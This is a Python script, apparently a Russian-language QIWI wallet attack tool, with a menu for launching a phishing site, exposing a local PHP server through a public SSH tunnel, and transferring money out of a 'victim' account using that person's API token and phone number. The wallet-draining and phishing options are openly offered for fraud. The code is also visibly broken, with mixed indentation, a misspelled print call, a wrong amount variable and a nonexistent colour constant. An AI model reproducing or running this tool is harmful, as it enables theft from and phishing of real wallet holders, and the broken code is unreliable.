import os
import subprocess
from SimpleQIWI import * 
from colorama import Fore, Back, Style

def cls():
    os.system('cls' if os.name=='nt' else 'clear')

cls()
print(Fore.GREEN + " /\  __\    /\__  _\    /\ \  __/\ \   /\__  _\   ")
print(" \ \ \/\ \   \/_/\ \/    \ \ \/\ \ \ \  \/_/\ \/    ")
print("  \ \ \ \ \     \ \ \     \ \ \ \ \ \ \    \ \ \   ")
print("   \ \ \ \ \     \_\ \__   \ \ \_/ \_\ \    \_\ \__  ")
print("    \ \___\_\    /\_____\   \ \___x___/    /\_____\  ")
print("     \/__//_/    \/_____/    '\/__//__/     \/_____/ ")
print("")
print("  _                                               ")
print(" /\_ \                     /\ \                       ")
print(" \/__/\ \            _   \ \ \/'\           _   ")
print("    _\ \ \  /'__\    /'___\  \ \ , <     /'__\ /\'__\ ")
print("   /\ \_\ \/\ \L\.\_ /\ \__/   \ \  \\  /\  / \ \ \/ ")
print("   \ \__/\ \__/.\_\\ \____\   \ \_\ \_\\ \____\ \ \_\ ")
print("    \/___/  \/__/\/_/ \/____/    \/_/\/_/ \/____/  \/_/")
print(" ")
print(Fore.CYAN + "  by @wannadeauth | @wannadeauth_chat (telegram)")
print("-------------------------------------------------")
print(Fore.BLACK + " ")
print(" ")
print(Fore.YELLOW + " [1] QIWI API (web version) | веб версия")
print(" ")
print(Fore.ORANGE + " [2] QIWI API (terminal) | в терминале")
print(" ")
print(Fore.BLUE + " [3] Fishing fake site | фишинг ")
print(" ")
print(" ")

a = input(Fore.GREEN + " Change parametr | Выберите параметр: ")


if a == "1":
    cls()
	print(Fore.GREEN + " /\  __\    /\__  _\    /\ \  __/\ \   /\__  _\   ")
	print(" \ \ \/\ \   \/_/\ \/    \ \ \/\ \ \ \  \/_/\ \/    ")
	print("  \ \ \ \ \     \ \ \     \ \ \ \ \ \ \    \ \ \   ")
	print("   \ \ \ \ \     \_\ \__   \ \ \_/ \_\ \    \_\ \__  ")
	print("    \ \___\_\    /\_____\   \ \___x___/    /\_____\  ")
	print("     \/__//_/    \/_____/    '\/__//__/     \/_____/ ")
	print("")
	print("  _                                               ")
	print(" /\_ \                     /\ \                       ")
	print(" \/__/\ \            _   \ \ \/'\           _   ")
	print("    _\ \ \  /'__\    /'___\  \ \ , <     /'__\ /\'__\ ")
	print("   /\ \_\ \/\ \L\.\_ /\ \__/   \ \  \\  /\  / \ \ \/ ")
	print("   \ \__/\ \__/.\_\\ \____\   \ \_\ \_\\ \____\ \ \_\ ")
	print("    \/___/  \/__/\/_/ \/____/    \/_/\/_/ \/____/  \/_/")
    print(" ")
	print(Fore.CYAN + "by @wannadeauth | @wannadeauth_chat (telegram)")
	print("-------------------------------------------------")
    print(" ")
    print(" ")
    print(Fore.GREEN + "  Starting Server... ")
    os.system("cd api")
    list_files = subprocess.run(["php", "-S", "localhost:8080"])
    os.system("ssh 80:localhost:8080 ssh.localhost.run")


elif a == "2":
	cls()
	print(Fore.GREEN + " /\  __\    /\__  _\    /\ \  __/\ \   /\__  _\   ")
	print(" \ \ \/\ \   \/_/\ \/    \ \ \/\ \ \ \  \/_/\ \/    ")
	print("  \ \ \ \ \     \ \ \     \ \ \ \ \ \ \    \ \ \   ")
	print("   \ \ \ \ \     \_\ \__   \ \ \_/ \_\ \    \_\ \__  ")
	print("    \ \___\_\    /\_____\   \ \___x___/    /\_____\  ")
	print("     \/__//_/    \/_____/    '\/__//__/     \/_____/ ")
	print("")
	print("  _                                               ")
	print(" /\_ \                     /\ \                       ")
	print(" \/__/\ \            _   \ \ \/'\           _   ")
	print("    _\ \ \  /'__\    /'___\  \ \ , <     /'__\ /\'__\ ")
	print("   /\ \_\ \/\ \L\.\_ /\ \__/   \ \  \\  /\  / \ \ \/ ")
	print("   \ \__/\ \__/.\_\\ \____\   \ \_\ \_\\ \____\ \ \_\ ")
	print("    \/___/  \/__/\/_/ \/____/    \/_/\/_/ \/____/  \/_/")
    print(" ")
	print(Fore.CYAN + "by @wannadeauth | @wannadeauth_chat (telegram)")
	rint("-------------------------------------------------")
    print(" ")
    print(" ")

	token = input(Fore.YELLOW + ' Enter victim token: ')
	print(" ")
    phone = input(' Enter victim phone: ')
    print(" ")
    summa = input(" Money | Сумма: ")
    print(" ")
    com = input(" Comments on the translation | Комментарий к переводу: ")
    api = QApi(token=token, phone=phone)
    print(" ")
    print(Fore.WHITE + 'Balance Founded | Найдено!')

    api.pay(account=" Where to transfer money? | Куда перевести деньги: ", amount= a, comment=com)
    print(api.balance)

elif a == "3":
	cls()
	print(Fore.GREEN + " /\  __\    /\__  _\    /\ \  __/\ \   /\__  _\   ")
	print(" \ \ \/\ \   \/_/\ \/    \ \ \/\ \ \ \  \/_/\ \/    ")
	print("  \ \ \ \ \     \ \ \     \ \ \ \ \ \ \    \ \ \   ")
	print("   \ \ \ \ \     \_\ \__   \ \ \_/ \_\ \    \_\ \__  ")
	print("    \ \___\_\    /\_____\   \ \___x___/    /\_____\  ")
	print("     \/__//_/    \/_____/    '\/__//__/     \/_____/ ")
	print("")
	print("  _                                               ")
	print(" /\_ \                     /\ \                       ")
	print(" \/__/\ \            _   \ \ \/'\           _   ")
	print("    _\ \ \  /'__\    /'___\  \ \ , <     /'__\ /\'__\ ")
	print("   /\ \_\ \/\ \L\.\_ /\ \__/   \ \  \\  /\  / \ \ \/ ")
    print("   \ \__/\ \__/.\_\\ \____\   \ \_\ \_\\ \____\ \ \_\ ")
    print("    \/___/  \/__/\/_/ \/____/    \/_/\/_/ \/____/  \/_/")


    print(" ")
    print(Fore.CYAN + "  by @wannadeauth | @wannadeauth_chat (telegram)")
    print("-------------------------------------------------")
    print(" ")
    print(" ")
    print(Fore.GREEN + "  Starting Server... ")
    os.system("cd fish")
    list_files = subprocess.run(["php", "-S", "localhost:8080"])
    os.system("ssh 80:localhost:8080 ssh.localhost.run")


else:
	print(Fore.RED + " Выбран неверный параметр | No found such parametr")


